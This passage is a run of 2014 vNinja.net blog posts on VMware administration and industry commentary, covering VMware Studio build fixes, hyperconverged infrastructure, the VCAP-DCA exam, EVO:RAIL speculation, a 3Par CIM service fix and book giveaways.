ln -s /opt/vmware/lib/libncurses.so.5.9 /opt/vmware/lib/libncurses.so.5

# Symlink PAM libraries in order for them to work with VAMI
# This "unbreaks" authentication in the web interface
mkdir /lib/security
ln -s /lib/i386-linux-gnu/security/* /lib/security/
```

For details on how all of this works, and how to create build profiles, check the official VMware Studio documentation. The build process should now complete successfully, and you should have an Ubuntu 14.04 based appliance built with VMware Studio!
Note that all of this is completely unsupported by VMware, and you are pretty much on your own. Hopefully there will be a new version of VMware Studio available soon, and we won’t have to rely on unsupported hacks to get it working with newer operating systems.

---

# Is Hyperconverged the be-all, end-all? No.

URL: https://vNinja.net/rant/hyperconverged-be-all-end-all-no/
Date: 2014-09-22
Author: christian
Tags: Architecture, Future, Hyperconverged, Intel

First off, this is not meant to be a post negating the value of current hyperconverged solutions available in the market. I think hyperconverged has its place, and for many use cases it makes perfect sense to go down that route. But the idea that everyone should go hyperconverged and all data should be placed on local drives, even if made redundant inside the chassis and even between chassis, is, to be blunt, a bit silly. Parts of this post are inspired by a recent discussion on Twitter:

@sudheenair @gallifreyan @jfrappier @Bacon_Is_King @mjm_973 all storage? Long term data too? I don't think so. — Christian Mohn™ (@h0bbel) September 20, 2014

I don’t believe that replacing your existing storage array with a hyperconverged solution, regardless of vendor, by moving your data off the array and onto the local disks in the cluster makes that much sense. Sure, keep your hot and fresh data set as close to the compute layer as possible, but for long-term archiving purposes? For rarely accessed, but required, data? Why would you do that? Of course, going hyperconverged would mean that you can free up some of that costly array space and leave long-term retention data on the array, but does the hyperconverged solution of choice let you do that? Does it even have FC HBAs? If not, is it cost effective to invest in it, while you at the same time need to keep your “traditional” infrastructure in place to keep all that data available? To quote Scott D. Lowe:

Any solution that uses standalone storage is not hyperconverged.
With a hyperconverged solution, every time a new node is added, there is additional compute, storage, and network capability added to the cluster. Simply adding a shelf of disks to an existing storage system does not provide linear scalability and can eventually lead to resource constraints if not managed carefully.

Doesn’t that really show one of the biggest problems with a hyperconverged infrastructure? If you need to scale CPU, memory AND storage at the same time, it makes perfect sense. But what if you need to scale just one of the items? Individually? Why should you have to buy more CPU, and licenses, if all you wanted was to add some more storage space? Of course, this brings the discussion right back to where it started: if you want to scale the various infrastructure components individually, then hyperconverged isn’t the right solution. But if hyperconverged isn’t the solution, and traditional “DIY” infrastructures have too many components to manage individually, then what? Sure, the Software Defined Data Center looks promising, but at the end of the day, we still need hardware to run the software on. The hardware may very well be generic, but it’s still required. Interestingly enough, a post by Scott Lowe (no, not the same one as quoted above) got me thinking about what the future might hold in this regard: Thinking About Intel Rack-Scale Architecture. To get to the point where we can manage a datacenter like a hyperconverged cluster, and still be able to scale vertically as needed, we need a completely new approach to the whole core architecture of our systems. Bundling CPU, memory, storage and networking in a single manageable unit doesn’t cut it in the long run. Now that the workloads are (mostly) virtualized, it’s time to take a real hard look at how the compute nodes are constructed.
Decoupling CPU, memory, storage volume, storage performance and network into entirely modular units that can be plugged in and scaled individually makes a whole lot more sense. By the looks of it, Intel Rack-Scale Architecture might just be that; I guess we’ll see down the road if it’s actually doable. The software side of things is moving fast, and honestly, I’m kind of glad that hardware isn’t moving at the same pace. At least that gives us breathing room enough to actually think about what we’re doing, or at the very least pretend that we do.

---

# Need the vSphere Client? VMware Has You Covered.

URL: https://vNinja.net/vmware-2/vsphere-client-vmware-covered/
Date: 2014-09-17
Author: christian
Tags: Download, ESXi, Knowledge Base, VMware, vSphere

One of the more popular posts, currently in third place, on vNinja.net is my list of vSphere Client direct download links posted back in March 2012. Thankfully William Lam had the same idea, and got a new Knowledge Base article published: Download URLs for VMware vSphere Client (2089791). Please use that article as the official download link documentation from now on.

---

# My VCAP-DCA 550 Experience

URL: https://vNinja.net/vmware-2/vcap-dca-550-experience/
Date: 2014-09-05
Author: christian
Tags: Certification, VCAP, VCAP-DCA, VMware

I finally took the plunge, and sat the VDCA550 exam yesterday. The VCAP5-DCA certification has been on my to-do list way too long, and I’m glad I can now tick that box and move on. The VDCA550 exam is held in a live lab environment, with approximately 23 lab activities, which are subsequently scored after the exam is finished. This means that you do not get an immediate pass/fail summary at the end of the exam; you’ll be feverishly checking your email until the score report is sent to you from VMware.

Preparation tips? #

Hands-on experience. There is no substitute for real experience when it comes to this exam. It’s a lab, and you need to be able to perform the tasks presented to you.
No amount of reading will prepare you for that, unless it’s also accompanied by actually working with the products. VCAP5-DCA Official Cert Guide: VMware Certified Advanced Professional 5 - Data Center Administration. I’ll be writing a more detailed review of the study guide later, but this book was invaluable for my preparation. Even if the book is mainly focused on the older VDCA510 exam, it also contains a chapter highlighting the changes in the blueprints between the 510 and 550 exams, which was really helpful. The best part of the study guide is **Chapter 10: Scenarios**, which goes through the certification blueprint and hands you specific tasks for each section. Get the book and do those; practicing will save you valuable time on exam day. Read the official vSphere documentation. End to end. Familiarize yourself enough with it, to the point that you know what keywords to search for if you get stuck on the labs.

Exam tips #

Time management. You get your allocated minutes, and that’s it. I was forcefully logged out of the lab environment as soon as the time ran out, and I had 4 labs left to complete at that time. Don’t get stuck on particular labs for disproportionate amounts of time. If you get stuck on something, cut your losses and move on. You can always return to a lab later if you have time for it. It’s better to score a few extra points by completing other labs than to lose points on a lab you end up not finishing anyway. Open up the documentation and the knowledge base in the lab browser. That speeds up searches, and if you know your way around those resources before you sit the exam, they can be a real lifesaver. As with “traditional” multiple-choice exams, read the lab descriptions carefully. Some lab descriptions are very clear on what the expected outcome is, others are more subtle. Make sure you understand the task at hand before starting on it.

The Exam #

I really enjoyed it. No, seriously, I’m not kidding.
This is the most fun I’ve ever had while actually working on obtaining a certification. The fact that you get to do real-world administrative tasks, without multiple-choice memory games, was a refreshing experience. You still need to know your stuff, but since you have the vSphere documentation and VMware Knowledge Base available to you during the exam, you can look things up if needed. See bullet #3 above. Working with the lab setup was a bit sluggish at times, especially when scrolling, something that requires frequent screen updates, but not as bad as I thought it would be. I was really lucky, as the turnaround time for scoring my exam was just shy of 30 minutes after finishing, something that saved me a lot of agonising about my poor exam time management skills. One last thing: I really hope VMware Education opens the door for more test centers in Norway. I had to fly to Oslo from Bergen to sit the exam, something that drives the cost of obtaining it dramatically higher. We have local test centers in Bergen, but they are not allowed to offer the advanced-level exams from VMware. If I had the ability to sit this exam locally, Bergen is Norway’s second largest city after all, I probably would have done this a long time ago. I almost missed my exam when my morning plane was cancelled, and when I finally got to Oslo my taxi driver had problems finding the test center. I got there just in time, but if I had arrived much later, I would have set my employer back the exam fee, the plane tickets, a taxi bill AND a day of lost productivity. Of course, I could have flown in the day before, but that would have added hotel bills to the cost equation as well.

---

# VMworld US is over. Now what?

URL: https://vNinja.net/rant/vmworld-over-what/
Date: 2014-09-05
Author: christian
Tags: Opinion, VMworld, Rant

Another VMworld US is over, with huge attendee numbers, and in keeping with tradition lots of new announcements were made.
I’m not going to go through them, enough posts have been made about that; the basis of this post is something completely different altogether. There seems to be a general expectation that we as a community are to be wooed by the announcements and flashy keynotes, but are we really the target audience? If you think about it, we probably aren’t. While we certainly like to think that we are the center of the universe, there is no factual evidence available to back that up. What I think a lot of us who work for vendors, partners or even competitors seem to forget is that we live and breathe this stuff on a daily basis, and for the most part we actually have a pretty good idea what is going to be announced, and why. We participate in beta programs and in general have our fingers on the pulse 24/7, and still we expect general announcements to cater to our own perceived reality. A reality that in many cases is years ahead of the real targets: the end users and customers. The announcements made at a conference like VMworld serve more than one purpose, but the main purpose is to generate buzz and interest in new products and services. We can talk about Software Defined Data Centers, with all their bells and whistles, until we run out of breath. We can talk about All-Flash-Arrays and sub-millisecond latency until we turn blue, or proclaim that DevOps is the only true way to enlightenment, but is that the reality that our customers live in day to day? For the most part, I really don’t think that is the case. New product announcements, new services and new buzzwords have an effect; they generate revenue down the line when the customers and end-users in the real world catch up with the bleeding edge reality we as tech-oligarchs live in. Reality: The state of things as they actually exist, as opposed to an idealistic or notional idea of them. You may say “I reject your reality and substitute my own”, but that doesn’t help us in any way, shape or form.
We are fortunate enough to live on the very bleeding edge of technology and we are actually in a position to help change the direction it takes in the future. Spend a minute and reflect on that. It’s kinda neat, isn’t it? Don’t stop pushing the boundaries of what we can do, and how, just take a break now and then and put your ear on the tracks and listen. A train might be on its way; don’t get hit by it just because you didn’t bother checking. --- # It's official: EVO:RAIL it is URL: https://vNinja.net/vmware-2/official-evorail/ Date: 2014-08-25 Author: christian Tags: Announcement, EVO, EVO:RAIL, Marvin, VMware, vmworld, Hyperconverged VMware has finally announced what I’ve been speculating about for some time now: EVO:RAIL was announced at VMworld US this morning. Short story: it’s an HCIA (HyperConverged Infrastructure Appliance), offered through several hardware vendors, with a new integrated management solution. Since I’m not at VMworld myself, I’ll leave the blog postings to those close to the action, but here is a quick collection of links to get you acquainted with the next EVOlution of SDDC from VMware: First off, have a look at Duncan Epping’s post: Meet VMware EVO:RAIL™ – A New Building Block for your SDDC and be sure to check out the videos on the EVO:RAIL product page. It’s interesting how Duncan explains that Marvin was the code name for the team working on this, not the actual product. That’s one part that most speculation posts missed, including mine. Either way, Project Mystic + Marvin = EVO:RAIL. Other links # Introducing VMware EVO: RAIL EVO: Rail – Integrated Hardware and Software EVO: Rail – Management Re-imagined VMware Announces Software Defined Infrastructure with EVO:RAIL #VMworld Announcement #1 VMware EVO:RAIL – What is it?
--- # #AdviceForVMworld URL: https://vNinja.net/rant/adviceforvmworld/ Date: 2014-08-22 Author: christian Tags: AdviceForVMworld, Rant, Venting, vmworld VMworld US is very soon upon us, and I’m one of the jealous ones left behind, not being able to attend. I will hopefully be able to join everyone at VMworld Europe in Barcelona in October though. An interesting Twitter hashtag #AdviceForVMworld appeared a week or so ago, with lots of good advice for people attending a huge tech conference. Here are a few good examples: #AdviceForVMworld: Just Say Hi, it is all about the conversations, networking. — Texiwill (@Texiwill) August 11, 2014 #AdviceForVMworld Avoid fighting fires @ the show. Change freeze starts now for critical home labs & production environments. — Jason Boche (@jasonboche) August 18, 2014 #AdviceForVMworld while have a schedule for sessions, etc. do not be afraid to miss a session to continue a conversation! #VMworld — Texiwill (@Texiwill) August 18, 2014 All of these contain some good advice and make perfect sense. This has also spurred a very good blog post, VMworld Mobile Toolchest, by Justin Warren. This one, however, made me cringe and actually scared me quite a bit: #AdviceForVMWorld double down on socks, shoes and underwear and go change between day & evening activities #VMworld — Haℕs De Leeℕheer (@HansDeLeenheer) August 18, 2014 Is the state of affairs so bad that there is a need to remind other human beings to change their underwear and take care of personal hygiene? After all, people who attend VMworld are largely people who are either responsible for running the IT infrastructure for large and small companies, or people who want to be in that position. Do we actually leave our Data Centers in the hands of people who need this kind of advice? I know that the track record for tech conferences is shady, especially when it comes to how we as a collective treat women at such events, and that is simply disgraceful.
The fact that we seem to have a need to tell people to wash, shower and clean themselves up, in addition to not being misogynistic assholes, saddens me. I have not personally witnessed any harassment at the VMworlds I have attended; this is meant as a general comment. I guess my only real solid #AdviceForVMworld is this: Be human. Use your brain. Don’t be an asshole. If everyone does that, we’ll get along just fine. If not, I hope someone tells you to shut up and leave. --- # It's EVOlution Baby! URL: https://vNinja.net/vmware-2/evolution-baby/ Date: 2014-08-21 Author: christian Tags: EVO, Marvin, VMware, vmworld Finally. I’ve finally found a way to put two of my favourite things together in a completely nonsensical way, namely VMware Marvin and Pearl Jam. As The Register reported earlier today, odds are that Marvin no longer responds to its project name, but rather to the new EVO name recently trademarked by VMware. There have been whispers of a Marvin name change for quite some time, so this isn’t really hard to believe. I have also found three new Twitter accounts, which at the time of discovery only followed one other account, namely @vmware: vmw evo rail vmw evo rack vmw evo rackscale So bring on Monday; this thing will be huge if it is what I think it is. And I think that it is. I think. So how does this tie in with Pearl Jam? It’s EVOlution, baby. --- # Problems connecting HP Insight Control Storage Module to StoreServ 7200 (3Par) URL: https://vNinja.net/storage-2/problems-connecting-hp-insight-control-storage-module-storeserv-7200-3par/ Date: 2014-08-21 Author: christian Tags: 3Par, HP, HP Insight Control, StoreServ, Troubleshooting, vCenter Operations Manager A customer of mine, who runs a pure HP environment based on c7000 and StoreServ 7200, wanted to get the HP Insight Control Storage Module for vCenter up and running.
The problem was that while we were able to connect to the older MSA array they run for non-production workloads, we were unable to connect to the newer StoreServ 7200. There is full IP connectivity between the application server that the HP Insight components run on and the storage controllers/VSP (no firewalls between them, they are located in the same subnet). The only error message we got was an “unable to connect” message, when using the same credentials and IP address used for the 3Par Management Console. After reaching out to quite a few people, including Twitter, we finally found the solution. It turns out that the CIM service on the array was not responding; in fact it was disabled, which naturally resulted in not being able to connect. A quick SSH session to the array confirmed that the CIM service was disabled:

login as: username
Password: *************
3par-array cli% showcim
-Service- -State-- --SLP-- SLPPort -HTTP-- HTTPPort -HTTPS- HTTPSPort PGVer CIMVer
Disabled Inactive Enabled 427 Enabled 5988 Enabled 5989 2.9.1 3.1.2
3par-array cli% stopcim
Are you sure you want to stop CIM server? select q=quit y=yes n=no: y
CIM server stopped successfully.
3par-array cli% startcim
CIM server will start in about 90 seconds
3par-array cli%

Restarting it fixed the issue, and we now have StoreServ data available directly in the vSphere Web (and C#) client. This also fixed the connection problem we had with vCenter Operations Manager and the HP StoreFront Analytics adapter. So, if you are unable to connect to your StoreServ, check the CIM service - it might just be disabled. --- # Marvin Related VMworld Sessions?
URL: https://vNinja.net/vmware-2/marvin-related-vmworld-sessions/ Date: 2014-08-20 Author: christian Tags: Hyperconverged, Marvin, SDDC, Speculation, vmworld It’s been a while since I tried speculating on the soon-to-be-announced VMware Marvin project, but some very recent VMworld US 2014 session additions look really interesting in that regard: SDDC1818 - VMware Customers Share Experiences and Requirements for Hyper-Converged SDDC2095 - VMware and Hyper-Converged Infrastructure SDDC1767 - SDDC at Scale with VMware Hyper-Converged Infrastructure: Deeper Dive SDDC3245-S - Software-Defined Data Center through Hyper-Converged Infrastructure If you look at 1767 specifically, since the other sessions are still very light on details, it has a rather interesting description: One way to simplify the CI environments is via a VMware-powered Converged Infrastructure solution (VMCI) that ties together hardware and software components under a single virtualization umbrella to offer a single point-of-entry for a Software Defined Data Center (SDDC). We will tie together VMware (and partner) assets spanning virtualization (compute/storage/networking), management (vCenter, VCAC), and operations/analytics (vCOPS, vCAC, etc) with hardware management, to offer a single point of SDDC entry with a tightly integrated automation for SDDC. I guess this is the real deal; a single point-of-entry for both hardware and software. It even mentions partners, which ties into my earlier speculation that VMware is not going into the hardware realm here, but rather working with OEMs. Now does this sound a lot like Marvin, or not? Update August 21st 2014 # A new session popped up today, with a rather conspicuous title (and great session number): SDDC1337 - VMware Hyper-Converged Infrastructure Technical Deepdive. Again, the session description is light on details; in fact, at the moment the link to the session itself only returns [Exception in:/detail/sessionDetail.jsp] null.
But, if you search for it, you get a bit more details: SDDC1337 - VMware Hyper-Converged Infrastructure Technical Deepdive In this session, Duncan Epping and Dave Shanley will provide technical details for VMware and Hyper-Converged Infrastructure. Dave Shanley - Lead Engineer, VMware Duncan Epping - Principal Architect, VMware Program Location: Europe and US It’s not even possible to schedule this session yet, as its time slots are not shown either. My guess is that it will be hidden until some time Monday morning (August 25th). Quite possibly right after, or even during, the 9:00AM - 10:30AM General Session. It seems you must be logged into vmworld.com and have a valid authenticated session to get all the details. Thanks to Mike Laverick for clearing that part up. So, both @DuncanYB & @daveshanley in one go. Think Marvin, think EVOlution. Attend this one if you can. --- # PernixData vSphere Pocketbook Blog Edition URL: https://vNinja.net/virtualization/pernixdata-vsphere-pocketbook-blog-edition/ Date: 2014-08-12 Author: christian Tags: Book, fun, PernixData, vmworld Following the success of the first vSphere Design Pocketbook, PernixData has created a new version, this time dubbed “Blog Edition”. Where the first book focused on small “tweet-sized” design tips, the new one allows for more in-depth articles, lifting the first edition’s 200-character limit. For some reason, I have been lucky enough to be selected as one of the contributors! You can pick up a printed copy at the PernixData Booth (1017) at VMworld US, or pre-order your electronic copy today. For more details, and a complete list of contributors, check Pre-order vSphere Pocketbook Blog Edition. Also, if you’re located in Norway, check out Arrow’s seminar with PernixData’s Frank Denneman on September 16th. Perhaps I’ll see you there?
--- # This Week in Virtualization URL: https://vNinja.net/virtualization/week-virtualization/ Date: 2014-07-18 Author: christian Tags: Audio, Podcast I was invited by Nick Martin and Tom Walat to join them in this pre-VMworld edition of the podcast, so if you’re not bored reading about my Marvin speculations already, you can now listen to them as well over at This Week in Virtualization by SearchServerVirtualization. It also covers some expectations for VMworld 2014, which is rapidly getting closer. --- # Root Cause of Invalid memory setting: memory reservation (sched.mem.min) should be equal to memsize (memsize) URL: https://vNinja.net/vmware-2/root-invalid-memory-setting-memory-reservation-sched-mem-min-equal-memsize-memsize/ Date: 2014-07-15 Author: christian Tags: 5.5, ESXi, Latency Sensitivity, Troubleshooting, vCenter, VM, VMware While working on reconfiguring my home lab setup, and migrating all the vSphere resources into a single cluster, I ran into a problem powering on one of the VMs which used to run on a single host. The power on operation yielded the following error message:

Invalid memory setting: memory reservation (sched.mem.min) should be equal to memsize (memsize)

Task Details:
Status: Invalid memory setting: memory reservation (sched.mem.min) should be equal to memsize(4096).
Error Stack:
An error was received from the ESX host while powering on VM MinecraftServer.
Failed to start the virtual machine.
Module MemSched power on failed.
An error occurred while parsing scheduler-specific configuration parameters.
Invalid memory setting: memory reservation (sched.mem.min) should be equal to memsize(4096).
Additional Task Details:
VC Build: 1476327
Error Type: GenericVmConfigFault
Task Id:
Task Cancelable: false
Canceled: false
Description Id: Datacenter.ExecuteVmPowerOnLRO
Event Chain Id: 20017

Clearly there was an issue with memory reservations on the VM, but there was no memory reservation enabled on it at all, nor should there be.
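As a toy illustration (the function and its names below are hypothetical, not VMware code), the constraint the error message spells out can be modeled directly: a VM that requires a full memory reservation only passes the power-on check when its reservation (sched.mem.min) equals its configured memory size.

```python
# Hypothetical sketch, not VMware code: a toy model of the admission check
# implied by the "sched.mem.min should be equal to memsize" error. VMs that
# demand a full memory reservation (as the latency sensitivity feature does)
# fail to power on unless reservation == memsize.

def can_power_on(memsize_mb: int, reservation_mb: int,
                 requires_full_reservation: bool) -> tuple[bool, str]:
    """Return (ok, message) mimicking the scheduler's validity check."""
    if requires_full_reservation and reservation_mb != memsize_mb:
        return (False,
                f"Invalid memory setting: memory reservation "
                f"(sched.mem.min) should be equal to memsize({memsize_mb})")
    return (True, "power-on allowed")

# The VM in this post: 4096 MB configured, no reservation set, but an
# advanced option forcing a full reservation -> power-on is rejected.
ok, msg = can_power_on(4096, 0, requires_full_reservation=True)
print(ok, msg)
```

With the flag cleared (the default), the same VM with no reservation powers on fine, which matches the behavior described below once the offending setting is reverted.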
The only related errors I found while investigating the issue were with regard to pass-through devices, which also did not apply in this case. It turns out that the problem was due to the VM being configured to use the latency sensitivity feature introduced in vSphere 5.5. The Deploying Extremely Latency-Sensitive Applications in VMware vSphere 5.5 whitepaper from VMware clearly states that usage of this feature also demands a memory reservation being set on the VM, and this VM had no reservation. In the end, the solution was a simple one: reverting the latency sensitivity advanced option for the VM to the default value of Normal let me power on the VM again without issues. The error message received in vCenter could be a lot clearer though, and a knowledge base article with the exact error message and resolution paths might be in order. It was not immediately obvious that the missing memory reservation error message was related to the latency sensitivity settings for the given VM. The vSphere Web Client shows a warning that you should check the CPU reservations, but does not mention memory reservations when you enable this feature. Now I just need to figure out why my home Minecraft server had that setting enabled in the first place… --- # Disaster Recovery using VMware vSphere Replication and vCenter Site Recovery Manager eBook Winners URL: https://vNinja.net/virtualization/disaster-recovery-vmware-vsphere-replication-vcenter-site-recovery-manager-ebook-winners/ Date: 2014-07-07 Author: christian Tags: Packt Publishing has picked two winners in the Disaster Recovery using VMware vSphere Replication and vCenter Site Recovery Manager eBook contest. The lucky winners are: Dee Abson (@deeabson) and James Kilby (@jameskilbynet). Congratulations, Packt Publishing will be in touch with you ASAP.
--- # Win an eBook Copy of Disaster Recovery using VMware vSphere Replication and vCenter Site Recovery Manager URL: https://vNinja.net/news/win-ebook-copy-disaster-recovery-vmware-vsphere-replication-vcenter-site-recovery-manager/ Date: 2014-06-20 Author: christian Tags: Book, contest, fun, Packt, Site Recovery Manager, VMware, vSphere Replication Hot off the heels of the Veeam® Backup & Replication for VMware vSphere giveaway, here is another one for you! Win a free eBook copy of Disaster Recovery using VMware vSphere Replication and vCenter Site Recovery Manager, just by commenting! For the contest I have 2 eBook copies to be given away to 2 lucky winners. How you can win # To win your eBook copy of this book, all you need to do is come up with a comment below highlighting the reason why you would like to win this book! Duration of the contest & selection of winners # The contest is valid for 2 weeks, it ends on the 4th of July, and is open to everyone. Winners will be selected by Packt Publishing on the basis of the comments posted. About the book # This is a step-by-step guide that will help you understand disaster recovery using VMware vSphere Replication 5.5 and VMware vCenter Site Recovery Manager (SRM) 5.5. The topics and configuration procedures are accompanied by relevant screenshots, flow-charts, and logical diagrams that make grasping the concepts easier. This book is a guide for anyone who is keen on using vSphere Replication or vCenter Site Recovery Manager as a disaster recovery solution. This is an excellent handbook for solution architects, administrators, on-field engineers, and support professionals. Although the book assumes that the reader has some basic knowledge of data center virtualization using VMware vSphere, it can still be a very good reference for anyone who is new to virtualization. So go ahead, leave a comment and win a copy!
--- # Learning Veeam Backup & Replication for VMware vSphere Book Winners URL: https://vNinja.net/news/learning-veeam-backup-replication-vmware-vsphere-book-winners/ Date: 2014-06-20 Author: christian Tags: Book, contest, Veeam, Winners Packt Publishing has picked three lucky winners for the Veeam® Backup & Replication for VMware vSphere book. The winners are as follows, with the winning comments: Chris Childerhose: Wow nice to see a book come out for Veeam. Look forward to the following things from this book to help better my Veeam skills - Install and manage a Veeam® Backup & Replication v7 infrastructure Discover how to back up and restore data in virtual environments Utilize WAN acceleration to speed up backup to remote locations Understand what options are available for Veeam® Backup & Replication, and how to configure these options These topics will help further my skills with Veeam. Hopefully I win the book too. VirtuallyMikeB: Being new to Veeam, it’s nice to see a book dedicated to it. There aren’t many VMware books associated with third-party products. I also see it’s written by this fella named Christian Mohn of vSoup and vCommunity fame. This is the biggest selling point of the book in my opinion. But if I were to explain why I’d like a copy of the book based on its contents, I’d say that it’s sure to be an excellent primer on Veeam Backup and Replication. Since I’ve never used it before, I’d be left to stumble around the interface in a test lab to figure out how to use it without a guide like this. I glean a lot from reading (hands on, too, of course) and this book would probably help me learn the product in the shortest amount of time possible. Thanks, Mike Adam Robinson: I am looking forward to getting more WAN-accel information as well as the U-AIR capability. Both topics are of high interest for an upcoming project! Congratulations, and I hope you’ll enjoy the book! --- # Is Marvin an Acronym? 
URL: https://vNinja.net/vmware-2/marvin-acronym/ Date: 2014-06-10 Author: christian Tags: HyperConverged, Marvin, Speculation, VMware The recent speculations surrounding Marvin have now hit The Register (too bad they don’t link this way, but I guess that’s how it is) as well, but one piece is still missing, arguably the most important one. We all know that the most important piece of something like this is its name, or acronym, not its technical merit… There have been a few attempts at guessing what Marvin is an acronym for, and here are some good ones from Twitter: @alaricdavies @ROIdude @alaricdavies Made-up Architecture Reference Virtual Infrastructure Node? #marvin — Jane Rimmer (@Rimmergram) June 10, 2014 .@ROIdude @Rimmergram MARVIN = Something Something Reference Virtual Infrastructure Node? #vmware #marvin — Alaric Davies (@alaricdavies) June 10, 2014 As well as Modular ARray of Virtualization Infrastructure Nodes by Kevin Kelling. How about this one: Modular Automated Rackable Virtual Infrastructure Node? I’m bored. — Marvin, the Paranoid Android Update January 12th 2021: # The acronym was in fact Modular Automated Rackable Virtual Infrastructure Node. So my speculation was actually spot on, and it was indeed an acronym as suspected at the time. It’s good to have that sorted over 6 years later, isn’t it? You know, for historical accuracy and all that. Reference # Actually, it was: Modular Automated Rackable Virtual Infrastructe Node... — Duncan Epping (@DuncanYB) January 12, 2021 --- # NSX for vSphere 6.0.4 - Documentation and Download? URL: https://vNinja.net/vmware-2/nsx-vsphere-6-0-4-documentation-download/ Date: 2014-06-10 Author: christian Tags: Availability, Download, Networking, NSX, WhatsUp? How long has NSX for vSphere 6.0.4 Documentation been publicly available? I just noticed this, and that the NSX downloads seem to be available via MyVMware - if you are entitled to it, that is.
Does this mean it will be available for download and we get to play with it soon-ish? It might have been available earlier too, unnoticed by yours truly… --- # Win Free e-copies of Learning Veeam® Backup & Replication for VMware vSphere URL: https://vNinja.net/book/win-free-e-copies-learning-veeam-backup-replication-vmware-vsphere/ Date: 2014-06-09 Author: christian Tags: Backup & Replication, Book, contest, fun, Veeam Update: The contest is now closed, and I have forwarded all comments to Packt Publishing, and they will contact the winners directly. Thanks to everyone who entered! I have teamed up with Packt Publishing to organize a giveaway of my new **Learning Veeam® Backup & Replication for VMware vSphere** book. 3 lucky winners stand a chance to win e-copies of the new book. Keep reading to find out how you can be one of them! Overview # Explore Veeam Backup and Replication v7 infrastructure and its components Create backup, replication, and restore strategies that protect data, your company’s most valuable asset Includes advanced features like off-site replication and tape retention How to Enter # All you need to do is head on over to the book page, look through the product description, and drop a line via the comments below this post to let us know what interests you the most about this book. It’s that simple! The winner will be picked by a representative from Packt Publishing. Deadline # The contest will close on June 15th. The winners will be contacted by email, so be sure to use your real email address when you comment! Contest is now closed. --- # Some more Marvin Speculation URL: https://vNinja.net/vmware-2/marvin-speculation/ Date: 2014-06-08 Author: christian Tags: Hyperconverged, Marvin, SDDC, Speculation, VMware Marvin the Paranoid Android (HHGG) After close to a full day of Twitter speculations and discussions on what Marvin really is, some thoughts stuck with me, and this is my attempt at articulating what I think VMware might be up to.
Please note that I have no real knowledge of the status of the project, nor if it really exists outside of a poster in a window on the VMware campus. All I do know is that there is a trademark registered, and that there seems to be some merit behind the speculations done by CRN and The Register. There is one little tidbit in the trademark registration that has caused more than a few people to raise their eyebrows: Computer hardware for virtualization; computer hardware enabling users to manage virtual computing resources that include networking and data storage That’s right, it mentions hardware! Does that mean that VMware is going to start building their own hardware, or OEM it from someone? I really don’t think that is the case. As far as I can gather, Marvin is more than a single physical hyper-converged hardware platform with known VMware bits on top, sprinkled with some new management interface. Pinning this appliance model to a single vendor, like Nutanix does with their Super Micro chassis and components, is not how VMware usually operates. I don’t even think it’s part of VMware’s DNA to limit Marvin to a single hardware vendor, even if EMC is their biggest stockholder. I think the key here is to think of Marvin as a standard for building hyper-converged solutions. Build nodes to spec, and VMware will certify them for Marvin. Imagine that. You can probably mix and match nodes from different vendors in the same “MarvinMatrix”. We’ve already seen VSAN Ready Nodes, so why not build Marvin Ready Nodes (for some reason I think VMware marketing might just come up with a better term come launch time…). Dell and Super Micro seem likely candidates, but how about Intel nodes? I am fairly sure that there are people within VMware, and The Federation, that have pretty good ties in that direction. The possibilities here are pretty awesome, just like they are with existing hyper-converged solutions. Need more compute?
Stick another node into your network “matrix”, import it, and it auto-configures itself based on whatever policy you have active. Need more storage? Well, do the same thing. Add a new node, or just stick a few more flash or hard drives into your existing chassis. We all know this is going to be based on vSphere and VSAN, but there are other components that are still left open for speculation: What about networking? We know VMware is pushing NSX, and we know they are working on making a smaller scale installation easier to implement. Given the time-frame we are looking at, namely next summer (read VMworld), I doubt that NSX will be a part of the first revision. Perhaps it’s going to be Arista at that point? The second thing is the magic sauce that will tie everything together, and I have a feeling that this is where VMware’s Marvin team is really focusing its attention these days. A solution like this, if my speculations are right, really needs a good management solution if it is to really deliver on what it seems to promise, namely a Software Defined Data Center, in a box. Or two boxes, for redundancy of course, or given VMware’s normal reliance on N+1, it’s probably best if you buy three of them to begin with. Why should I want to make anything up? Life's bad enough as it is without wanting to invent any more of it. - Marvin, the Paranoid Android --- # What is VMware's Mystic Marvin Project? URL: https://vNinja.net/vmware-2/vmwares-mystic-marvin-project/ Date: 2014-06-08 Author: christian Tags: Hyperconverged, Marvin, Speculation, VMware Yesterday Fletcher Cocquyt posted a rather interesting photo on his Twitter account: This is, as far as I know, the first public sighting confirming the existence of the “mystic” project Marvin that VMware is working on.
The text reads “Introducing the world’s first 100% VMware powered hyper converged infrastructure appliance.” I guess some of the VMware engineers forgot that the VMware campus gets external visitors from time to time… So what is it? Well, there aren’t many details available, but Marvin is indeed a registered trademark, by VMware. According to the trademark registration, its purpose is pretty clear: Computer hardware for virtualization; computer hardware enabling users to manage virtual computing resources that include networking and data storage. It has previously been speculated that VMware was building a hyper converged solution with EMC, but I doubt that EMC is the only OEM player here. VMware has a history of working with several vendors, and not just the mothership. I guess we’ll have to wait until VMworld US to get the full stack shimmies, but I don’t think there is any doubt that this will be based on vSphere and VSAN, and perhaps even a scaled down version of NSX. I like the idea of “roll your own hyper converged stack”, based on an appliance model. After all, and I’m paraphrasing Joe Baguley here: Is your solution really software defined, if it requires specific bits of tin to work? Bring on VMworld, I really want to meet Marvin, but let’s hope he’s a bit more upbeat than the original from Hitchhiker’s Guide to the Galaxy: Marvin is a severely depressed robot. He's regularly so depressed that, when he gets bored and talks to other computers, they commit suicide and die. I guess we all should bring our own towels to this one. For more speculation have a look at http://vninja.net/vmware-2/marvin-speculation/ --- # And the Chromecast Winner is ... URL: https://vNinja.net/virtualization/chromecast-winner/ Date: 2014-05-08 Author: christian Tags: Chromecast, contest, fun, Ninja, Photo, Winner A little over a month ago I announced the Want to Win a Google Chromecast contest, and finally the winner has been selected.
